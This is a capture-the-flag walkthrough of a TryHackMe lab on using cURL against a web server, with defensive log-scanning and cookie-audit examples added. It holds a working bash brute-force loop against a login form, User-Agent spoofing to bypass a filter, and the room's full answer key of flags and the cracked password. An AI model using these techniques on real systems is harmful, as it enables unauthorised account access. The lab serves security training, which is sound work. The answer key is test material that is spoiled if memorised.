Access the room: https://tryhackme.com/room/webhackingusingcurl-aoc2025-w8q1a4s7d0
According to blue-team intel, the wormhole is held open by a control panel on the Evil Bunnies’ web server. The team must shut it down first to cut off reinforcements before facing King Malhare.
However, the terminal they have is bare. No Burp Suite, no browser, just a command prompt.
But that’s fine. The team will use the command line and cURL to speak HTTP directly: send requests, read responses, and find the endpoints that shut the portal.
Learning Objectives
- Understand what HTTP requests and responses are at a high level.
- Use cURL to make basic requests (using GET) and view raw responses in the terminal.
- Send POST requests with cURL to submit data to endpoints.
- Work with cookies and sessions in cURL to maintain login state across requests.
Step-by-Step Walkthrough
Initial Setup
Start the target machine and the AttackBox as instructed to access the lab environment.

Note: Make sure to replace MACHINE_IP with your target machine’s IP in my walkthrough write-up.
Understanding HTTP and cURL
HTTP (Hypertext Transfer Protocol) is the language used by clients to request resources from servers. Every page load, form submission, or API call boils down to an HTTP request followed by a response.
curl allows us to manually create those requests. Instead of clicking buttons or filling forms, we send the same data directly from the terminal. This gives us full visibility and control over what is being sent.
To request the home page of a server, we can simply run:
curl http://MACHINE_IP/
This sends an HTTP GET request and prints the raw HTML response directly in the terminal.
Exploiting POST Requests
Most login forms submit credentials using the POST method. By observing the form action, we can replicate the request manually.
A basic POST request with credentials looks like this:
curl -X POST -d "username=user&password=user" http://MACHINE_IP/post.php
Here:
-X POST specifies the HTTP method.
-d sends form data in URL-encoded format (the same application/x-www-form-urlencoded body a browser form submits).
If the credentials are incorrect, the application returns an error message.
Including the form's submit field in the body reproduces exactly what the browser sends:
curl -X POST -d "username=user&password=user&submit=Login" http://MACHINE_IP/post.php
To view exactly what the server returns (response headers as well as the body), add the -i flag; this is useful for spotting redirects, Set-Cookie headers, or session identifiers:
curl -i -X POST -d "username=user&password=user&submit=Login" http://MACHINE_IP/post.php
Now let's make a POST request to the /post.php endpoint with the username admin and the password admin:
curl -i -X POST -d "username=admin&password=admin" http://MACHINE_IP/post.php
Hooray, we’re logged in and have found our flag! THM{curl_post_success}
Session Handling with Cookies
Web applications rely on cookies to maintain authenticated sessions. Browsers handle cookies automatically, but with cURL, we must manage them ourselves.
We authenticate and save the cookies to the file cookies.txt using this command:
curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/session.php
In this case the response says the credentials are invalid, but on a successful login you'll often see a session cookie such as PHPSESSID=xyz123 written to the cookie file.
After saving the cookie, we reuse the session cookie to access the same endpoint:
curl -b cookies.txt http://MACHINE_IP/session.php
The -b option tells cURL to send the saved cookies with the request, just like a browser would.
Now let's grab our second flag by sending a request to the /cookie.php endpoint using the username "admin" and the password "admin," then save the cookie:
curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/cookie.php
Next, we reuse the session cookie to access the same endpoint:
curl -b cookies.txt http://MACHINE_IP/cookie.php
Hurray, we got our second flag! THM{session_cookie_master}
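As an added example (not part of the room or the walkthrough's own commands), the two shell functions below read the Netscape-format cookie jar that -c cookies.txt writes, so you can see which session cookie the server issued and whether it carries the Secure and HttpOnly attributes before replaying it with -b. The jar contents, the host 10.10.1.5 and both cookie values are constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the room: read the cookie jar that "curl -c cookies.txt" writes.
# The jar is in Netscape format: one tab-separated line per cookie with the fields
# domain, include-subdomains, path, secure, expiry (0 = session cookie), name, value.
# Cookies the server marked HttpOnly are stored with a "#HttpOnly_" prefix on the domain.

# Print the value of cookie NAME ($2) from jar FILE ($1); prints nothing if absent.
cookie_value() {
  awk -F'\t' -v name="$2" '
    /^#HttpOnly_/ { sub(/^#HttpOnly_/, "") }   # strip the prefix so the line parses normally
    /^#/ || NF < 7 { next }                    # skip comment and blank lines
    $6 == name { print $7; exit }
  ' "$1"
}

# One line per cookie: name, domain, and whether it is Secure, HttpOnly, and session-scoped.
cookie_audit() {
  awk -F'\t' '
    { ho = "no" }
    /^#HttpOnly_/ { sub(/^#HttpOnly_/, ""); ho = "yes" }
    /^#/ || NF < 7 { next }
    { printf "%s domain=%s secure=%s httponly=%s %s\n", $6, $1,
             ($4 == "TRUE" ? "yes" : "no"), ho, ($5 == 0 ? "session" : "persistent") }
  ' "$1"
}

# Constructed sample jar (host 10.10.1.5 and both cookie values are made up), written to a
# temp file whose path is printed.
sample_jar() {
  local f
  f=$(mktemp)
  {
    printf '# Netscape HTTP Cookie File\n# constructed sample, not written by libcurl\n\n'
    printf '#HttpOnly_10.10.1.5\tFALSE\t/\tFALSE\t0\tPHPSESSID\txyz123\n'
    printf '10.10.1.5\tFALSE\t/\tTRUE\t1893456000\tremember_me\tabc\n'
  } > "$f"
  printf '%s' "$f"
}

# Usage: jar=$(sample_jar); cookie_value "$jar" PHPSESSID; cookie_audit "$jar"
# With a real jar, "curl -b cookies.txt http://MACHINE_IP/cookie.php" replays the same session cookie.
```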
Brute Forcing Credentials with cURL
Once we understand how a login request works, automating it becomes trivial. In this challenge, a weak login form is vulnerable to brute forcing.
Begin by creating a file named passwords.txt and adding the following passwords to it:
nano passwords.txt
Paste the following passwords into it:
admin123
password
letmein
secretpass
secret
Save and exit (Ctrl+X, then Y, then Enter).
Now let's create a simple bash loop called loop.sh to try each password against bruteforce.php:
nano loop.sh
Paste the following script into it (MACHINE_IP is your target's IP, as noted above):
#!/bin/bash
# Try every password in passwords.txt against bruteforce.php and stop at the first success.
while IFS= read -r pass; do
  echo "Trying password: $pass"
  # -s silences the progress meter so only the response body is captured
  response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
  if echo "$response" | grep -q "Welcome"; then
    echo "[+] Password found: $pass"
    break
  fi
done < passwords.txt
Save and exit (Ctrl+X, then Y, then Enter).
Then add the execute permission to the script:
chmod +x loop.sh
Go ahead and run the brute force script now:
./loop.sh
We discovered the password, and it turns out the admin user's password is secretpass.
The script we just ran does three things:
- Sends repeated POST requests.
- Checks responses for a success indicator.
- Stops once the correct password is found.
This manual approach mirrors the behavior of automated tools like Hydra, Burp Intruder, or WFuzz, helping us understand what they do behind the scenes.
Bypassing User-Agent Restrictions
Some applications restrict access based on the User-Agent header to block tools like cURL.
By default, cURL identifies itself clearly: User-Agent: curl/7.x.x
To specify a custom user-agent, we can use the -A flag:
curl -A "internalcomputer" http://MACHINE_IP/ua_check.php
To confirm the check is in place, run these two commands:
curl -i http://MACHINE_IP/ua_check.php
curl -i -A "internalcomputer" http://MACHINE_IP/ua_check.php
If the first fails and the second succeeds, the User-Agent check is working, and we've bypassed it by spoofing the header.
Now let’s make a request to the /agent.php endpoint with the user-agent TBFC:
curl -A "TBFC" http://MACHINE_IP/agent.php
Hurray, we found our last flag! THM{user_agent_filter_bypassed}
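As an added example covering both the brute-force section and the User-Agent section (not part of the room or the walkthrough), here is the same traffic seen from the web server's side: two shell functions that scan combined-format access-log lines for a burst of POSTs to /bruteforce.php from one client and for requests carrying a default tool User-Agent. The log lines, client addresses and the tool-signature list are constructed assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the room: the defender's view of the brute-force loop and the
# User-Agent spoof. Both functions read "combined" access-log lines, where the request line
# is the second double-quoted field and the User-Agent is the last one.

# Clients that POSTed to /bruteforce.php at least $2 times: prints "<ip> <count>" per client.
flag_bruteforce() {
  awk -F'"' -v limit="$2" '
    $2 ~ /^POST \/bruteforce\.php/ { split($1, a, " "); n[a[1]]++ }
    END { for (ip in n) if (n[ip] >= limit) print ip, n[ip] }
  ' "$1" | sort
}

# Requests whose User-Agent matches a tool signature (assumed list: curl default, Wfuzz,
# python-requests): prints "<ip> <user-agent>". A spoofed agent such as "internalcomputer"
# will not match, which is why the per-client count above is the more reliable signal.
flag_tool_agents() {
  awk -F'"' '
    $6 ~ /^(curl\/|Wfuzz|python-requests\/)/ { split($1, a, " "); print a[1], $6 }
  ' "$1" | sort -u
}

# Constructed sample log: a four-request burst from 10.10.5.7, its spoofed-agent request,
# and ordinary browser traffic from 10.10.9.2. Written to a temp file whose path is printed.
sample_log() {
  local f
  f=$(mktemp)
  cat > "$f" <<'EOF'
10.10.5.7 - - [24/Dec/2025:10:00:01 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.10.5.7 - - [24/Dec/2025:10:00:01 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.10.5.7 - - [24/Dec/2025:10:00:02 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.10.5.7 - - [24/Dec/2025:10:00:02 +0000] "POST /bruteforce.php HTTP/1.1" 200 598 "-" "curl/8.5.0"
10.10.5.7 - - [24/Dec/2025:10:00:05 +0000] "GET /ua_check.php HTTP/1.1" 200 120 "-" "internalcomputer"
10.10.9.2 - - [24/Dec/2025:10:01:00 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
10.10.9.2 - - [24/Dec/2025:10:01:03 +0000] "POST /post.php HTTP/1.1" 302 0 "http://10.10.1.5/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"
EOF
  printf '%s' "$f"
}

# Usage: log=$(sample_log); flag_bruteforce "$log" 3; flag_tool_agents "$log"
```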
Bonus Mission
This section is optional and applies only to the final bonus question. The instructions in this section do not apply to the regular questions. Feel free to skip it and proceed with the regular questions if you don’t intend to attempt it.
Before the final battle can begin, the wormhole must be closed to stop enemy reinforcements. The evil Easter bunnies operate a web control panel that holds it open. The blue team must identify endpoints, authenticate and obtain the operator token, and call the close operation.
Hint: Use rockyou.txt when brute forcing the password (only for the bonus mission). The PIN is between 4000 and 5000.
Secret hint:
Use the following command to generate a list of numbers from 4000 to 5000 for brute forcing the PIN:
seq 4000 5000 > numbers.txt
Server: http://MACHINE_IP/terminal.php?action=panel
Lab Answers
Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?
THM{curl_post_success}
— — — — — — — — — — — — — — —
Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag you receive?
THM{session_cookie_master}
— — — — — — — — — — — — — — —
After doing the brute force on the /bruteforce.php endpoint, what is the password of the admin user?
secretpass
— — — — — — — — — — — — — — —
Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag you receive?
THM{user_agent_filter_bypassed}